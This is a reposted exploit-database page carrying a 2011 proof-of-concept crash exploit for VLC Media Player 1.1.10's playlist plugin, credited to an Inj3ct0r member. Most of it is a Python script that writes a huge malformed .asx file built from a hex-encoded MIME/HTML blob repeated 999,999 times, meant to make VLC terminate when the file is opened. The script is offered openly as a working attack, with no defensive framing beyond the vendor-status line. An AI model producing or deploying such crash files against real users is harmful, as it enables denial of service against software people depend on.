VLC Media Player 1.1.10 The Luggage (libplaylist

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

VLC Media Player 1.1.10 The Luggage (libplaylist_plugin.dll) Terminate POC

来源：jimsalimg@msn.com 作者：SeeMe 发布时间：2011-08-17

============================================================================
VLC Media Player 1.1.10 The Luggage (libplaylist_plugin.dll) Terminate POC
============================================================================

#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
#0     _                   __           __       __                     1
#1   /' \            __ /'__`\        /\ \__ /'__`\                   0
#0 /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \ _ ___           1
#1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\          0
#0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
#1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
#0       \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/           1
#1                  \ \____/ >> Exploit database separated by exploit   0
#0                   \/___/          type (local, remote, DoS, etc.)    1
#1                                                                      1
#0 [+] Site            : 1337day.com                                   0
#1 [+] Support e-mail : submit[at]1337day.com                         1
#0                                                                      0
#1                    ####################################              1
#0                    I'm SeeMe member from Inj3ct0r Team              1
#1                    ####################################              0
#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[-] VLC Media Player 1.1.10 The Luggage (libplaylist_plugin.dll) Terminate POC
[-] Application : VLC Media Player
[-] Version : 1.1.10 The Luggage
[-] Date 09/Aug/2011
[-] App Homepage : http://www.videolan.org
[-] VLC.exe     MD5: EFA856D5AC262D26BB3B6CCB07A9F97F
[-] Vendor Status : Uninformed
[-] Vulnerability discovered by SeeMe <jimsalimg@msn.com>
[-] special shouts goes to : r0073r (1337day.com)
[-] L0rd CruSad3r, Th3 RDX, KnocKout
[-] Sid3^effects, Gunslinger_, The Explo!ted
[-] Eidelweiss, Exploit-id team
[-] ZoRLu, Indoushka, Dev-PoinT.com Team Specialy anT!-Tr0J4n
[-] SeeMe WILL BE BACK SOON TO CODE SOME SHIT

-------------------------
~ vlc.exe
~ 1.1.10.0
~ 4dec1ec0
~ libplaylist_plugin.dll
~ 4ded62f2
~ 40000015
~ 0000334f
-------------------------

[-] MHT logo :-|
[-] Very :-) Reliable

=======================
Proof of Concept Code
=======================

import os
from time import sleep

if os.name == "nt":
os.system("cls")
os.system("color 4A")
else:
os.system("clear")

print '''

          VLC Media Player 1.1.10 (libplaylist_plugin.dll) Terminate POC
          Vulnerability discovered by SeeMe <jimsalimg@msn.com>
          Coded By SeeMe

                                             1337day.com Inj3ct0r Member!

'''
sleep(1)

path = "C:\\File.asx"
f = open(path, "wb")
f.write('\x4D\x49\x4D\x45\x2D\x56\x65\x72\x73\x69\x6F\x6E\x3A\x20\x31\x2E\x30\x0D\x0A\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65\x3A\x20\x6D\x75\x6C\x74\x69\x70\x61\x72\x74\x2F\x72\x65\x6C\x61\x74\x65\x64\x3B\x0D\x0A\x09\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x68\x74\x6D\x6C\x22\x3B\x0D\x0A\x09\x62\x6F\x75\x6E\x64\x61\x72\x79\x3D\x22\x2D\x2D\x2D\x2D\x3D\x5F\x4E\x65\x78\x74\x50\x61\x72\x74\x5F\x30\x30\x30\x5F\x30\x30\x30\x30\x5F\x30\x31\x43\x43\x35\x37\x38\x36\x2E\x43\x30\x43\x32\x31\x32\x30\x30\x22\x0D\x0A\x58\x2D\x4D\x69\x6D\x65\x4F\x4C\x45\x3A\x20\x50\x72\x6F\x64\x75\x63\x65\x64\x20\x42\x79\x20\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x20\x4D\x69\x6D\x65\x4F\x4C\x45\x20\x56\x36\x2E\x31\x2E\x37\x36\x30\x31\x2E\x31\x37\x36\x30\x39\x0D\x0A\x0D\x0A\x54\x68\x69\x73\x20\x69\x73\x20\x61\x20\x6D\x75\x6C\x74\x69\x2D\x70\x61\x72\x74\x20\x6D\x65\x73\x73\x61\x67\x65\x20\x69\x6E\x20\x4D\x49\x4D\x45\x20\x66\x6F\x72\x6D\x61\x74\x2E\x0D\x0A\x0D\x0A\x2D\x2D\x2D\x2D\x2D\x2D\x3D\x5F\x4E\x65\x78\x74\x50\x61\x72\x74\x5F\x30\x30\x30\x5F\x30\x30\x30\x30\x5F\x30\x31\x43\x43\x35\x37\x38\x36\x2E\x43\x30\x43\x32\x31\x32\x30\x30\x0D\x0A\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65\x3A\x20\x74\x65\x78\x74\x2F\x68\x74\x6D\x6C\x3B\x0D\x0A\x09\x63\x68\x61\x72\x73\x65\x74\x3D\x22\x77\x69\x6E\x64\x6F\x77\x73\x2D\x31\x32\x35\x36\x22\x0D\x0A\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x72\x61\x6E\x73\x66\x65\x72\x2D\x45\x6E\x63\x6F\x64\x69\x6E\x67\x3A\x20\x37\x62\x69\x74\x0D\x0A\x0D\x0A\x3C\x68\x74\x6D\x6C\x3E\x0D\x0A\x3C\x68\x65\x61\x64\x3E\x3C\x74\x69\x74\x6C\x65\x3E\x26\x23\x36\x37\x3B\x26\x23\x39\x37\x3B\x26\x23\x31\x31\x32\x3B\x26\x23\x31\x31\x36\x3B\x26\x23\x31\x31\x37\x3B\x26\x23\x31\x31\x34\x3B\x26\x23\x31\x30\x31\x3B\x3C\x2F\x74\x69\x74\x6C\x65\x3E\x3C\x2F\x68\x65\x61\x64\x3E\x0D\x0A\x3C\x62\x6F\x64\x79\x3E\x0D\x0A\x3C\x69\x6D\x67\x20\x62\x6F\x72\x64\x65\x72\x3D\x22\x30\x22\x20\x73\x72\x63\x3D\x22\x63\x69\x64\x3A\x46\x41\x37\x35\x36\x33\x37\x43\x34\x33\x44\x34\x34\x33\x36\x35\x39\x43\x37\x37\x45\x38\x34\x39\x44\x34\x38\x36\x43\x31\x32\x33\x40\x64\x6E\x73\x22\x20\x2F\x3E\x0D\x0A\x3C\x62\x72\x3E\x0D\x0A\x3C\x2F\x62\x6F\x64\x79\x3E\x3C\x2F\x68\x74\x6D\x6C\x3E\x0D\x0A\x0D\x0A\x2D\x2D\x2D\x2D\x2D\x2D\x3D\x5F' * 999999)
f.close()

print "GO THE FUCK TO : " + path
sleep(3)

#_END_

[